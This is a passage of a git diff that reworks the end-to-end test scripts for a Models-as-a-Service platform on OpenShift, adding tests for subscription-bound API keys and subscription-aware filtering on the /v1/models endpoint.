Run deployment validation + token metadata verification # # USAGE: @@ -41,6 +41,7 @@ # Affects deploy.sh (via --disable-tls-backend) and test env # DEPLOYMENT_NAMESPACE - Namespace of MaaS API and controller (default: opendatahub) # MAAS_SUBSCRIPTION_NAMESPACE - Namespace of MaaS CRs (default: models-as-a-service) +# MODEL_NAMESPACE - Namespace of models and MaaSModelRefs (default: llm) # ============================================================================= set -euo pipefail @@ -75,6 +76,7 @@ export OPERATOR_IMAGE=${OPERATOR_IMAGE:-} AUTHORINO_NAMESPACE="kuadrant-system" DEPLOYMENT_NAMESPACE="${DEPLOYMENT_NAMESPACE:-opendatahub}" MAAS_SUBSCRIPTION_NAMESPACE="${MAAS_SUBSCRIPTION_NAMESPACE:-models-as-a-service}" +MODEL_NAMESPACE="${MODEL_NAMESPACE:-llm}" # Artifact collection: OpenShift CI provides ARTIFACT_DIR (docs.ci.openshift.org/docs/architecture/step-registry). # Files written here are collected to artifacts/// in Prow. Fallbacks: ARTIFACTS, LOG_DIR, or local reports. @@ -214,15 +216,15 @@ deploy_models() { fi # Deploy all at once so dependencies resolve correctly - # Sample kustomizations hardcode namespace: models-as-a-service; override to $MAAS_SUBSCRIPTION_NAMESPACE + # E2E test fixtures kustomization hardcodes namespace: models-as-a-service; override to $MAAS_SUBSCRIPTION_NAMESPACE # so CRs land in the correct namespace. - if ! (cd "$PROJECT_ROOT" && kustomize build docs/samples/maas-system/ | \ + if ! (cd "$PROJECT_ROOT" && kustomize build test/e2e/fixtures/ | \ sed "s/namespace: models-as-a-service/namespace: $MAAS_SUBSCRIPTION_NAMESPACE/g" | \ kubectl apply -f -); then - echo "❌ ERROR: Failed to deploy MaaS system" + echo "❌ ERROR: Failed to deploy MaaS system with e2e fixtures" exit 1 fi - echo "✅ MaaS system deployed (free + premium tiers)" + echo "✅ MaaS system deployed (free + premium + e2e test fixtures)" echo "Waiting for models to be ready..." if ! 
oc wait llminferenceservice/facebook-opt-125m-simulated -n llm --for=condition=Ready --timeout=300s; then @@ -239,53 +241,41 @@ deploy_models() { fi echo "✅ Simulator models ready" - # TODO: Currently waits for ever and bounces controller (seems like they are not reconciled even after llmisvc are reported as up) + # Wait for MaaSModelRefs to transition to Ready phase. + # The controller now properly handles the race condition where MaaSModelRef is created + # before KServe creates the HTTPRoute (sets Pending, then Ready when HTTPRoute watch triggers). echo "Waiting for MaaSModelRefs to be Ready..." - local retries=0 + local timeout=300 # 5 minutes - sufficient for KServe to create HTTPRoutes + local deadline=$((SECONDS + timeout)) local all_ready=false - while [[ $retries -lt 30 ]]; do + local found_any=false + + while [[ $SECONDS -lt $deadline ]]; do all_ready=true + found_any=false while IFS= read -r phase; do + found_any=true if [[ "$phase" != "Ready" ]]; then all_ready=false break fi - done < <(oc get maasmodelrefs -n llm -o jsonpath='{range .items[*]}{.status.phase}{"\n"}{end}' 2>/dev/null) - if $all_ready && [[ -n "$(oc get maasmodelrefs -n llm -o name 2>/dev/null)" ]]; then + done < <(oc get maasmodelrefs -n "$MODEL_NAMESPACE" -o jsonpath='{range .items[*]}{.status.phase}{"\n"}{end}' 2>/dev/null) + + if $found_any && $all_ready; then + echo "✅ MaaSModelRefs ready" break fi - retries=$((retries + 1)) + sleep 5 done - if ! $all_ready; then - # TODO: Remove this workaround once maas-controller reconcile logic is correct. - # Controller can get stuck in a bad state forever; bouncing may unstick it. - echo " MaaSModelRefs not ready after ${retries} retries, bouncing maas-controller..." - kubectl rollout restart deployment/maas-controller -n "$DEPLOYMENT_NAMESPACE" 2>/dev/null || true - kubectl rollout status deployment/maas-controller -n "$DEPLOYMENT_NAMESPACE" --timeout=120s 2>/dev/null || true - echo " Retrying MaaSModelRefs wait..." 
- retries=0 - while [[ $retries -lt 30 ]]; do - all_ready=true - while IFS= read -r phase; do - if [[ "$phase" != "Ready" ]]; then - all_ready=false - break - fi - done < <(oc get maasmodelrefs -n llm -o jsonpath='{range .items[*]}{.status.phase}{"\n"}{end}' 2>/dev/null) - if $all_ready && [[ -n "$(oc get maasmodelrefs -n llm -o name 2>/dev/null)" ]]; then - break - fi - retries=$((retries + 1)) - sleep 5 - done - fi - - if $all_ready; then - echo "✅ MaaSModelRefs ready" - else - echo "⚠️ WARNING: MaaSModelRefs still not ready after bounce, continuing anyway" + if ! $found_any || ! $all_ready; then + echo "❌ ERROR: MaaSModelRefs did not reach Ready state within ${timeout}s" + echo "Dumping MaaSModelRef status:" + oc get maasmodelrefs -n "$MODEL_NAMESPACE" -o yaml || true + echo "Dumping controller logs:" + kubectl logs deployment/maas-controller -n "$DEPLOYMENT_NAMESPACE" --tail=100 || true + exit 1 fi wait_for_auth_policies_enforced @@ -415,7 +405,7 @@ setup_premium_test_token() { } run_e2e_tests() { - echo "-- E2E Tests (API Keys + Subscription) --" + echo "-- E2E Tests (API Keys + Subscription + Models Endpoint) --" # Note: setup_premium_test_token() is called earlier in main execution # (Phase 1: Admin Setup) while still logged in as system:admin @@ -429,7 +419,7 @@ run_e2e_tests() { # from its own namespace, but models are deployed in 'llm' namespace. # TODO: Fix maas-api to list MaaSModelRefs from ALL namespaces (pass "" to ListFromMaaSModelRefLister) export MODEL_NAME="facebook-opt-125m-simulated" - export E2E_MODEL_NAMESPACE="llm" + export E2E_MODEL_NAMESPACE="$MODEL_NAMESPACE" # TOKEN and ADMIN_OC_TOKEN are already exported by setup_test_tokens() local test_dir="$PROJECT_ROOT/test/e2e" @@ -454,15 +444,16 @@ run_e2e_tests() { echo " - ADMIN_OC_TOKEN: $(echo "${ADMIN_OC_TOKEN:-not set}" | cut -c1-20)..." 
echo " - GATEWAY_HOST: ${GATEWAY_HOST}" - # Run all e2e tests: API keys, subscription, and namespace scoping tests + # Run all e2e tests: API keys, subscription, models endpoint, and namespace scoping tests if ! PYTHONPATH="$test_dir:${PYTHONPATH:-}" pytest \ -v --maxfail=5 --disable-warnings \ --junitxml="$xml" \ --html="$html" --self-contained-html \ --capture=tee-sys --show-capture=all --log-level=INFO \ "$test_dir/tests/test_api_keys.py" \ - "$test_dir/tests/test_subscription.py"; then - # "$test_dir/tests/test_namespace_scoping.py" \ + "$test_dir/tests/test_namespace_scoping.py" \ + "$test_dir/tests/test_subscription.py" \ + "$test_dir/tests/test_models_endpoint.py" ; then echo "❌ ERROR: E2E tests failed" exit 1 fi diff --git a/test/e2e/tests/conftest.py b/test/e2e/tests/conftest.py index 5044893fd..cea745cca 100644 --- a/test/e2e/tests/conftest.py +++ b/test/e2e/tests/conftest.py @@ -153,11 +153,12 @@ def api_key(api_keys_base_url: str, headers: dict) -> str: Note: The key inherits the authenticated user's groups, which should include system:authenticated to satisfy AuthPolicy requirements for model access. 
""" - print("[api_key] Creating API key for inference tests...") + sim_sub = os.environ.get("E2E_SIMULATOR_SUBSCRIPTION", "simulator-subscription") + print("[api_key] Creating API key for inference tests (subscription bound at mint)...") r = requests.post( api_keys_base_url, headers=headers, - json={"name": "e2e-test-inference-key"}, + json={"name": "e2e-test-inference-key", "subscription": sim_sub}, timeout=30, verify=TLS_VERIFY, ) diff --git a/test/e2e/tests/test_api_keys.py b/test/e2e/tests/test_api_keys.py index 0b7c4d598..77aa5141c 100644 --- a/test/e2e/tests/test_api_keys.py +++ b/test/e2e/tests/test_api_keys.py @@ -18,6 +18,7 @@ - ADMIN_OC_TOKEN: Admin token for admin-specific tests (optional, tests skip if not set) - MODEL_NAME: Override model name for inference tests (optional) - INFERENCE_MODEL_NAME: Model name for inference request body (optional) +- E2E_SIMULATOR_SUBSCRIPTION: Bound on the session ``api_key`` fixture at mint (default: simulator-subscription) Admin Tests: Admin tests (TestAPIKeyAuthorization, admin bulk revoke) require ADMIN_OC_TOKEN. @@ -303,17 +304,10 @@ class TestAPIKeyExpiration: def max_expiration_days(self) -> int: """Get the configured max expiration days from environment. - This value must be explicitly provided by the test harness via the - API_KEY_MAX_EXPIRATION_DAYS environment variable so that it matches - the maas-api deployment configuration. If not set or invalid, these - tests are skipped to avoid flaky behavior from configuration mismatch. + Defaults to 90 days if API_KEY_MAX_EXPIRATION_DAYS is not set, + matching the maas-api default (constant.DefaultAPIKeyMaxExpirationDays). 
""" - val = os.environ.get("API_KEY_MAX_EXPIRATION_DAYS") - if val is None: - pytest.skip( - "API_KEY_MAX_EXPIRATION_DAYS not set; skipping expiration policy tests " - "to avoid mismatch with maas-api configuration" - ) + val = os.environ.get("API_KEY_MAX_EXPIRATION_DAYS", "90") try: return int(val) except ValueError: @@ -457,18 +451,12 @@ def test_api_key_model_access_success( inference_model_name: str, ): """Test 11: Valid API key can access model endpoint - verify 200 response. - - Note: Users with access to multiple subscriptions must specify which one - to use via X-MaaS-Subscription header. + + Subscription is bound on the key at mint (see conftest ``api_key`` fixture). """ - # Add subscription header - required when user matches multiple subscriptions - subscription_name = os.environ.get("E2E_SIMULATOR_SUBSCRIPTION", "simulator-subscription") - headers = api_key_headers.copy() - headers["X-MaaS-Subscription"] = subscription_name - r = requests.post( model_completions_url, - headers=headers, + headers=api_key_headers, json={ "model": inference_model_name, "prompt": "Hello world", @@ -546,10 +534,11 @@ def test_revoked_api_key_rejected( ): """Test 14: Revoked API key should be rejected with 403.""" # Create a new key + designated = os.environ.get("E2E_SIMULATOR_SUBSCRIPTION", "simulator-subscription") r_create = requests.post( api_keys_base_url, headers=headers, - json={"name": "test-revoke-inference"}, + json={"name": "test-revoke-inference", "subscription": designated}, timeout=30, verify=TLS_VERIFY, ) @@ -630,68 +619,3 @@ def test_api_key_chat_completions( print(f"[inference] Chat completions returned {r.status_code}: {r.text[:200]}") # Don't fail - chat may not be supported pytest.skip(f"Chat completions returned {r.status_code}") - - def test_api_key_with_explicit_subscription_header( - self, - model_completions_url: str, - api_key_headers: dict, - inference_model_name: str, - ): - """Test 16: API key with explicit x-maas-subscription header. 
- - When multiple subscriptions exist for the same model, the user can - specify which subscription to use via the x-maas-subscription header. - This works the same way for API keys as it does for OC tokens. - """ - # Default subscription for free model - subscription_name = os.environ.get("E2E_SIMULATOR_SUBSCRIPTION", "simulator-subscription") - - # Add x-maas-subscription header to API key headers - headers_with_sub = api_key_headers.copy() - headers_with_sub["x-maas-subscription"] = subscription_name - - r = requests.post( - model_completions_url, - headers=headers_with_sub, - json={ - "model": inference_model_name, - "prompt": "Test subscription header", - "max_tokens": 5, - }, - timeout=60, - verify=TLS_VERIFY, - ) - - assert r.status_code == 200, f"Expected 200 with explicit subscription, got {r.status_code}: {r.text}" - print("[inference] API key with x-maas-subscription header succeeded") - - def test_api_key_with_invalid_subscription_header( - self, - model_completions_url: str, - api_key_headers: dict, - inference_model_name: str, - ): - """Test 17: API key with invalid x-maas-subscription header should fail. - - If the specified subscription doesn't exist or user isn't authorized, - the request should be rejected with 429 (rate limited) or 403 (forbidden). 
- """ - # Add invalid subscription header - headers_with_invalid_sub = api_key_headers.copy() - headers_with_invalid_sub["x-maas-subscription"] = "nonexistent-subscription-xyz" - - r = requests.post( - model_completions_url, - headers=headers_with_invalid_sub, - json={ - "model": inference_model_name, - "prompt": "Test invalid subscription", - "max_tokens": 5, - }, - timeout=30, - verify=TLS_VERIFY, - ) - - # Should get 429 (rate limited - no valid subscription) or 403 (forbidden) - assert r.status_code in (429, 403), f"Expected 429/403 for invalid subscription, got {r.status_code}: {r.text}" - print(f"[inference] API key with invalid subscription correctly rejected with {r.status_code}") diff --git a/test/e2e/tests/test_models_endpoint.py b/test/e2e/tests/test_models_endpoint.py new file mode 100644 index 000000000..2e785abfc --- /dev/null +++ b/test/e2e/tests/test_models_endpoint.py @@ -0,0 +1,2104 @@ +""" +E2E tests for the /v1/models endpoint that validate subscription-aware model filtering. + +Tests the /v1/models endpoint in maas-api/internal/handlers/models.go which lists +available models filtered by the user's subscription access. + +Requires same environment setup as test_subscription.py: + - GATEWAY_HOST env var (e.g. maas.apps.cluster.example.com) + - MAAS_API_BASE_URL env var (e.g. 
https://maas.apps.cluster.example.com/maas-api) + - maas-controller deployed with example CRs applied + - oc/kubectl access to create service account tokens +""" + +import json +import logging +import os +import subprocess +import time + +import pytest +import requests + +# Import helpers from test_subscription module +from test_subscription import ( + _apply_cr, + _create_api_key, + _create_sa_token, + _create_test_auth_policy, + _create_test_subscription, + _delete_cr, + _delete_sa, + _get_auth_policies_for_model, + _get_cr, + _get_subscriptions_for_model, + _maas_api_url, + _ns, + _sa_to_user, + _snapshot_cr, + _wait_reconcile, + DISTINCT_MODEL_ID, + DISTINCT_MODEL_REF, + DISTINCT_MODEL_2_ID, + DISTINCT_MODEL_2_REF, + MODEL_NAMESPACE, + MODEL_REF, + PREMIUM_MODEL_REF, + UNCONFIGURED_MODEL_REF, + SIMULATOR_ACCESS_POLICY, + SIMULATOR_SUBSCRIPTION, + TIMEOUT, + TLS_VERIFY, +) + +log = logging.getLogger(__name__) + + +class TestModelsEndpoint: + """ + End-to-end tests for the /v1/models endpoint that validate subscription-aware + model filtering behavior. + + The /v1/models endpoint (maas-api/internal/handlers/models.go) lists available + models filtered by authentication method and subscription access. Key behaviors: + - API keys: Returns models from the subscription bound to the key at mint time (ignores header) + - K8s tokens (no header): Returns models from all accessible subscriptions + - K8s tokens (with X-MaaS-Subscription): Filters to specified subscription + - Returns HTTP 403 with permission_error for subscription authorization failures + - Returns HTTP 401 for missing authentication + - Filters models based on subscription access (probes each model endpoint) + + Test Coverage (22 tests) - Organized by Expected HTTP Status: + + ═══════════════════════════════════════════════════════════════════════════ + SUCCESS CASES (HTTP 200) - Authentication Method Behaviors + ═══════════════════════════════════════════════════════════════════════════ + 1. 
test_api_key_scoped_to_subscription + → API key returns models from bound subscription only + + 2. test_api_key_ignores_subscription_header + → API key ignores x-maas-subscription header and uses bound subscription + + 3. test_multiple_api_keys_different_subscriptions + → Multiple API keys each bound to different subscriptions work independently + + 4. test_user_token_returns_all_models + → K8s token (no header) returns models from all subscriptions + + 5. test_user_token_with_subscription_header_filters + → K8s token with X-MaaS-Subscription filters to that subscription + + 6. test_service_account_token_multiple_subs_no_header + → K8s token with access to multiple subscriptions returns all (no header) + + 7. test_service_account_token_multiple_subs_with_header + → K8s token with multiple subscriptions filters by header + + ═══════════════════════════════════════════════════════════════════════════ + SUCCESS CASES (HTTP 200) - Legacy Behaviors (backwards compatibility) + ═══════════════════════════════════════════════════════════════════════════ + 8. test_single_subscription_auto_select + → User with one subscription, no header → 200 (returns that subscription's models) + + 9. test_explicit_subscription_header + → K8s token with explicit X-MaaS-Subscription header → 200 (filters to that subscription) + + 10. test_empty_subscription_header_value + → Empty header value → 200 (same as no header - returns all models) + + ═══════════════════════════════════════════════════════════════════════════ + SUCCESS CASES (HTTP 200) - Model Filtering & Data Validation + ═══════════════════════════════════════════════════════════════════════════ + 11. test_models_filtered_by_subscription + → Models correctly filtered by specified subscription + + 12. test_deduplication_same_model_multiple_refs + → Same modelRef listed twice deduplicates to 1 entry (same URL) + + 13. test_different_modelrefs_same_model_id + → Different modelRefs (different URLs) return 2 separate entries + + 14. 
test_multiple_distinct_models_in_subscription
+        → Different modelRefs with different IDs returns 2 entries (no duplicates)
+
+    15. test_empty_model_list
+        → Empty model list should return [] not null
+
+    16. test_response_schema_matches_openapi
+        → Response structure matches OpenAPI specification
+
+    17. test_model_metadata_preserved
+        → Model fields (url, ready, created, owned_by) accurate
+
+    ═══════════════════════════════════════════════════════════════════════════
+    ERROR CASES (HTTP 403) - Permission Errors
+    ═══════════════════════════════════════════════════════════════════════════
+    18. test_api_key_with_deleted_subscription_403
+        → API key bound to deleted subscription → 403 permission_error
+
+    19. test_api_key_with_inaccessible_subscription_403
+        → API key/user with subscription they don't have access to → 403 permission_error
+
+    20. test_invalid_subscription_header_403
+        → K8s token with non-existent subscription → 403 permission_error
+
+    21. test_access_denied_to_subscription_403
+        → K8s token with subscription they lack access to → 403 permission_error
+
+    ═══════════════════════════════════════════════════════════════════════════
+    ERROR CASES (HTTP 401) - Authentication Errors
+    ═══════════════════════════════════════════════════════════════════════════
+    22. test_unauthenticated_request_401
+        → No Authorization header → 401 authentication_error
+    """
+
+    @classmethod
+    def setup_class(cls):
+        """Validate test environment prerequisites before running any tests."""
+        log.info("=" * 60)
+        log.info("Validating /v1/models E2E Test Prerequisites")
+        log.info("=" * 60)
+
+        # Validate MODEL_REF exists and is Ready
+        model = _get_cr("maasmodelref", MODEL_REF, MODEL_NAMESPACE)
+        if not model:
+            pytest.fail(f"PREREQUISITE MISSING: MaaSModelRef '{MODEL_REF}' not found in namespace '{MODEL_NAMESPACE}'. 
" + f"Ensure prow setup has created the model.") + + phase = model.get("status", {}).get("phase") + endpoint = model.get("status", {}).get("endpoint") + if phase != "Ready" or not endpoint: + pytest.fail(f"PREREQUISITE INVALID: MaaSModelRef '{MODEL_REF}' not Ready " + f"(phase={phase}, endpoint={endpoint or 'none'}). " + f"Wait for reconciliation or check controller logs.") + + log.info(f"✓ Model '{MODEL_REF}' is Ready") + log.info(f" Endpoint: {endpoint}") + + # Discover existing auth policies and subscriptions (for debugging) + cls.discovered_auth_policies = _get_auth_policies_for_model(MODEL_REF) + cls.discovered_subscriptions = _get_subscriptions_for_model(MODEL_REF) + + log.info(f"✓ Found {len(cls.discovered_auth_policies)} auth policies for model:") + for policy in cls.discovered_auth_policies: + log.info(f" - {policy}") + + log.info(f"✓ Found {len(cls.discovered_subscriptions)} subscriptions for model:") + for sub in cls.discovered_subscriptions: + log.info(f" - {sub}") + + # Validate expected resources exist + if SIMULATOR_ACCESS_POLICY not in cls.discovered_auth_policies: + pytest.fail(f"PREREQUISITE MISSING: Expected auth policy '{SIMULATOR_ACCESS_POLICY}' not found. " + f"Found: {cls.discovered_auth_policies}. " + f"Ensure prow setup has created the auth policy.") + + if SIMULATOR_SUBSCRIPTION not in cls.discovered_subscriptions: + pytest.fail(f"PREREQUISITE MISSING: Expected subscription '{SIMULATOR_SUBSCRIPTION}' not found. " + f"Found: {cls.discovered_subscriptions}. " + f"Ensure prow setup has created the subscription.") + + log.info("=" * 60) + log.info("✅ All prerequisites validated - proceeding with /v1/models tests") + log.info("=" * 60) + + def test_single_subscription_auto_select(self): + """ + Test: User with exactly one accessible subscription can list models without + providing x-maas-subscription header (auto-selection). + + Expected: HTTP 200 with models from that subscription. 
+ + Note: Temporarily deletes simulator-subscription to ensure test user has exactly + ONE subscription (not two, which would require a header). + """ + sa_name = "e2e-models-single-sub-sa" + sa_ns = "default" + maas_ns = _ns() + auth_policy_name = "e2e-single-sub-auth" + subscription_name = "e2e-single-sub-subscription" + + # Snapshot existing subscription to restore later + original_sim = _snapshot_cr("maassubscription", SIMULATOR_SUBSCRIPTION) + + api_key = None + try: + # Create service account + sa_token = _create_sa_token(sa_name, namespace=sa_ns) + sa_user = _sa_to_user(sa_name, namespace=sa_ns) + + # Delete simulator-subscription so user has exactly ONE subscription + # (otherwise they'd have 2: ours + simulator-subscription via system:authenticated) + _delete_cr("maassubscription", SIMULATOR_SUBSCRIPTION) + + # Create auth policy and subscription for test user using DISTINCT_MODEL_REF + # (avoids conflicts with existing simulator-access auth policy) + log.info(f"Creating auth policy and subscription for {sa_user} with {DISTINCT_MODEL_REF}") + _create_test_auth_policy(auth_policy_name, DISTINCT_MODEL_REF, users=[sa_user]) + _create_test_subscription(subscription_name, DISTINCT_MODEL_REF, users=[sa_user]) + + # Create API key for inference + api_key = _create_api_key(sa_token, name=f"{sa_name}-key") + + # Wait for Authorino to sync auth policies (can take 30+ seconds) + log.info("Waiting 30s for Authorino to sync auth policies...") + time.sleep(30) + + # DEBUG: Test model endpoint directly first + log.info("DEBUG: Testing direct model endpoint access...") + model_endpoint = f"https://{os.environ['GATEWAY_HOST']}/llm/{DISTINCT_MODEL_REF}/v1/models" + debug_r = requests.get( + model_endpoint, + headers={ + "Authorization": f"Bearer {api_key}", + "x-maas-subscription": subscription_name, + }, + timeout=TIMEOUT, + verify=TLS_VERIFY, + ) + log.info(f"DEBUG: Direct model endpoint returned {debug_r.status_code}") + if debug_r.status_code == 200: + log.info(f"DEBUG: 
Direct model endpoint data: {debug_r.json()}") + else: + log.info(f"DEBUG: Direct model endpoint error: {debug_r.text}") + + # Poll /v1/models until it returns models or timeout + log.info("Testing: GET /v1/models with single subscription (no header, auto-select)") + url = f"{_maas_api_url()}/v1/models" + + timeout_seconds = 60 + poll_interval = 2 + deadline = time.time() + timeout_seconds + r = None + + while time.time() < deadline: + r = requests.get( + url, + headers={"Authorization": f"Bearer {api_key}"}, + timeout=TIMEOUT, + verify=TLS_VERIFY, + ) + + if r.status_code == 200: + models = (r.json().get("data") or []) + if len(models) > 0: + log.info(f"✅ Models available after {60 - int(deadline - time.time())}s") + break + log.info(f"Got 200 but no models yet, retrying... ({int(deadline - time.time())}s remaining)") + else: + log.info(f"Got {r.status_code}, retrying... ({int(deadline - time.time())}s remaining)") + + time.sleep(poll_interval) + + assert r is not None and r.status_code == 200, f"Expected 200 for single subscription auto-select, got {r.status_code if r else 'timeout'}: {r.text if r else 'no response'}" + + # Validate response structure + data = r.json() + assert data.get("object") == "list", f"Expected object='list', got {data.get('object')}" + assert "data" in data, "Response missing 'data' field" + + # Handle API bug: data may be null instead of [] + models = data.get("data") or [] + + # Should have at least one model (facebook-opt-125m-simulated from simulator-subscription) + assert len(models) > 0, f"Expected at least one model in response, got {len(models)}. 
Data was: {data.get('data')}" + + # Validate model structure + for model in models: + assert "id" in model, "Model missing 'id' field" + assert "object" in model, "Model missing 'object' field" + assert "created" in model, "Model missing 'created' field" + assert "owned_by" in model, "Model missing 'owned_by' field" + + # Validate subscriptions field (new feature) + assert "subscriptions" in model, "Model missing 'subscriptions' field" + assert isinstance(model["subscriptions"], list), "subscriptions should be a list" + assert len(model["subscriptions"]) == 1, \ + f"Expected 1 subscription (auto-selected), got {len(model['subscriptions'])}" + assert model["subscriptions"][0]["name"] == subscription_name, \ + f"Expected subscription '{subscription_name}', got '{model['subscriptions'][0]['name']}'" + + log.info(f"✅ Single subscription auto-select → {r.status_code} with {len(models)} model(s)") + + finally: + # Restore simulator-subscription first (critical for other tests) + if original_sim: + _apply_cr(original_sim) + + # Clean up test resources + _delete_cr("maasauthpolicy", auth_policy_name, namespace=maas_ns) + _delete_cr("maassubscription", subscription_name, namespace=maas_ns) + _delete_sa(sa_name, namespace=sa_ns) + _wait_reconcile() + + def test_explicit_subscription_header(self): + """ + Test: K8s token with multiple subscriptions can list models by providing + x-maas-subscription header. + + Expected: HTTP 200 with models from only the specified subscription. + + Note: Creates SA that has access to both simulator-subscription (via system:authenticated) + and premium-simulator-subscription (by adding SA to its users list). + Uses K8s token directly (not API key) since API keys ignore the header. 
+ """ + sa_name = "e2e-models-explicit-header-sa" + sa_ns = "default" + maas_ns = _ns() + sa_user = None + + try: + # Create service account - will be in system:authenticated group + # This gives access to simulator-subscription automatically + sa_token = _create_sa_token(sa_name, namespace=sa_ns) + sa_user = _sa_to_user(sa_name, namespace=sa_ns) + + # Add SA to premium-simulator-subscription to give it access to a second subscription + log.info(f"Adding {sa_user} to premium-simulator-subscription users") + subprocess.run([ + "kubectl", "patch", "maassubscription", "premium-simulator-subscription", + "-n", maas_ns, + "--type=json", + "-p", f'[{{"op": "add", "path": "/spec/owner/users/-", "value": "{sa_user}"}}]' + ], check=True) + + _wait_reconcile() + + # Test: GET /v1/models WITH x-maas-subscription header using K8s token + # Expected: Returns models from simulator-subscription only + log.info("Testing: GET /v1/models with K8s token and explicit subscription header: simulator-subscription") + url = f"{_maas_api_url()}/v1/models" + r = requests.get( + url, + headers={ + "Authorization": f"Bearer {sa_token}", # K8s token, not API key + "x-maas-subscription": "simulator-subscription", + }, + timeout=TIMEOUT, + verify=TLS_VERIFY, + ) + + assert r.status_code == 200, f"Expected 200 with explicit subscription header, got {r.status_code}: {r.text}" + + # Validate response structure + data = r.json() + assert data.get("object") == "list", f"Expected object='list', got {data.get('object')}" + assert "data" in data, "Response missing 'data' field" + models = data.get("data", []) if data.get("data") is not None else [] + + # Should have at least one model from simulator-subscription + assert len(models) > 0, f"Expected at least one model in response, got {len(models)}. 
Data was: {data.get('data')}" + + # Validate subscriptions field + for model in models: + assert "subscriptions" in model, "Model missing 'subscriptions' field" + assert isinstance(model["subscriptions"], list), "subscriptions should be a list" + assert len(model["subscriptions"]) == 1, \ + f"Expected 1 subscription (explicit header), got {len(model['subscriptions'])}" + assert model["subscriptions"][0]["name"] == "simulator-subscription", \ + f"Expected 'simulator-subscription', got '{model['subscriptions'][0]['name']}'" + + log.info(f"✅ K8s token with explicit subscription header → {r.status_code} with {len(models)} model(s)") + + finally: + # Remove SA from premium-simulator-subscription + if sa_user is not None: + log.info(f"Removing {sa_user} from premium-simulator-subscription users") + # Get current users list, remove our SA, then patch + result = subprocess.run([ + "kubectl", "get", "maassubscription", "premium-simulator-subscription", + "-n", maas_ns, "-o", "jsonpath={.spec.owner.users}" + ], capture_output=True, text=True) + + if sa_user in result.stdout: + users = json.loads(result.stdout) if result.stdout and result.stdout.strip() else [] + users = [u for u in users if u != sa_user] + subprocess.run([ + "kubectl", "patch", "maassubscription", "premium-simulator-subscription", + "-n", maas_ns, + "--type=merge", + "-p", json.dumps({"spec": {"owner": {"users": users}}}) + ], check=True) + + _delete_sa(sa_name, namespace=sa_ns) + _wait_reconcile() + + def test_empty_subscription_header_value(self): + """ + Test 12: Empty subscription header value behaves correctly. + + Header present but empty should behave like missing header (auto-select or 403). 
+ """ + log.info("Test 12: Empty subscription header value") + + sa_name = "e2e-models-empty-header-sa" + sa_ns = "default" + api_key = None + + try: + # Create SA and API key with access to only one subscription + sa_token = _create_sa_token(sa_name, namespace=sa_ns) + + api_key_response = requests.post( + f"{_maas_api_url()}/v1/api-keys", + headers={"Authorization": f"Bearer {sa_token}", "Content-Type": "application/json"}, + json={"name": "e2e-empty-header-test-key"}, + timeout=TIMEOUT, + verify=TLS_VERIFY, + ) + assert api_key_response.status_code in (200, 201) + api_key = api_key_response.json().get("key") + + _wait_reconcile() + + # Test with empty header value + r = requests.get( + f"{_maas_api_url()}/v1/models", + headers={ + "Authorization": f"Bearer {api_key}", + "x-maas-subscription": "", # Empty string + }, + timeout=TIMEOUT, + verify=TLS_VERIFY, + ) + + # Should behave same as no header (auto-select single subscription) + assert r.status_code == 200, \ + f"Empty header should auto-select single subscription, got {r.status_code}: {r.text}" + + data = r.json() + assert data.get("object") == "list" + + log.info(f"✅ Empty subscription header → {r.status_code} (auto-selected)") + + finally: + _delete_sa(sa_name, namespace=sa_ns) + + def test_models_filtered_by_subscription(self): + """ + Test 8: Models are correctly filtered by subscription. + + User with access to multiple subscriptions should only see models from + the subscription specified in x-maas-subscription header. 
+ """ + log.info("Test 8: Models filtered by subscription") + + sa_name = "e2e-models-filtered-sa" + sa_ns = "default" + maas_ns = _ns() + api_key = None + sa_user = None + + try: + # Create SA with access to both subscriptions + sa_token = _create_sa_token(sa_name, namespace=sa_ns) + sa_user = _sa_to_user(sa_name, namespace=sa_ns) + + # Add SA to premium subscription + log.info(f"Adding {sa_user} to premium-simulator-subscription") + subprocess.run([ + "kubectl", "patch", "maassubscription", "premium-simulator-subscription", + "-n", maas_ns, + "--type=json", + "-p", f'[{{"op": "add", "path": "/spec/owner/users/-", "value": "{sa_user}"}}]' + ], check=True) + + # Create API key + api_key_response = requests.post( + f"{_maas_api_url()}/v1/api-keys", + headers={"Authorization": f"Bearer {sa_token}", "Content-Type": "application/json"}, + json={"name": "e2e-filtered-test-key"}, + timeout=TIMEOUT, + verify=TLS_VERIFY, + ) + assert api_key_response.status_code in (200, 201) + api_key = api_key_response.json().get("key") + + _wait_reconcile() + + # Get models from simulator-subscription + r_simulator = requests.get( + f"{_maas_api_url()}/v1/models", + headers={ + "Authorization": f"Bearer {api_key}", + "x-maas-subscription": "simulator-subscription", + }, + timeout=TIMEOUT, + verify=TLS_VERIFY, + ) + assert r_simulator.status_code == 200 + simulator_models = r_simulator.json().get("data") or [] + simulator_model_ids = {m["id"] for m in simulator_models} + + # Get models from premium-simulator-subscription + r_premium = requests.get( + f"{_maas_api_url()}/v1/models", + headers={ + "Authorization": f"Bearer {api_key}", + "x-maas-subscription": "premium-simulator-subscription", + }, + timeout=TIMEOUT, + verify=TLS_VERIFY, + ) + assert r_premium.status_code == 200 + premium_models = r_premium.json().get("data") or [] + premium_model_ids = {m["id"] for m in premium_models} + + # Verify models are different between subscriptions + # (assuming premium has different models than 
free tier) + log.info(f"Simulator models: {simulator_model_ids}") + log.info(f"Premium models: {premium_model_ids}") + + # The key assertion: models are subscription-specific + # If there's any overlap, that's fine, but each list should be filtered + # At minimum, verify we got responses for both + assert len(simulator_models) >= 0, "Should get response for simulator subscription" + assert len(premium_models) >= 0, "Should get response for premium subscription" + + log.info(f"✅ Models filtered by subscription → simulator: {len(simulator_models)}, premium: {len(premium_models)}") + + finally: + # Cleanup + if sa_user is not None: + result = subprocess.run([ + "kubectl", "get", "maassubscription", "premium-simulator-subscription", + "-n", maas_ns, "-o", "jsonpath={.spec.owner.users}" + ], capture_output=True, text=True) + + if sa_user in result.stdout: + users = json.loads(result.stdout) if result.stdout and result.stdout.strip() else [] + users = [u for u in users if u != sa_user] + subprocess.run([ + "kubectl", "patch", "maassubscription", "premium-simulator-subscription", + "-n", maas_ns, + "--type=merge", + "-p", json.dumps({"spec": {"owner": {"users": users}}}) + ], check=True) + + _delete_sa(sa_name, namespace=sa_ns) + + def test_deduplication_same_model_multiple_refs(self): + """ + Test 6: Same modelRef listed twice should deduplicate to 1 entry. + + Creates a subscription with the SAME modelRef listed TWICE (different rate limits). + The API deduplicates by (model ID, URL) and returns only 1 entry since both + references point to the same backend service. + + The response includes subscription information showing which subscription(s) + provide access to the model. 
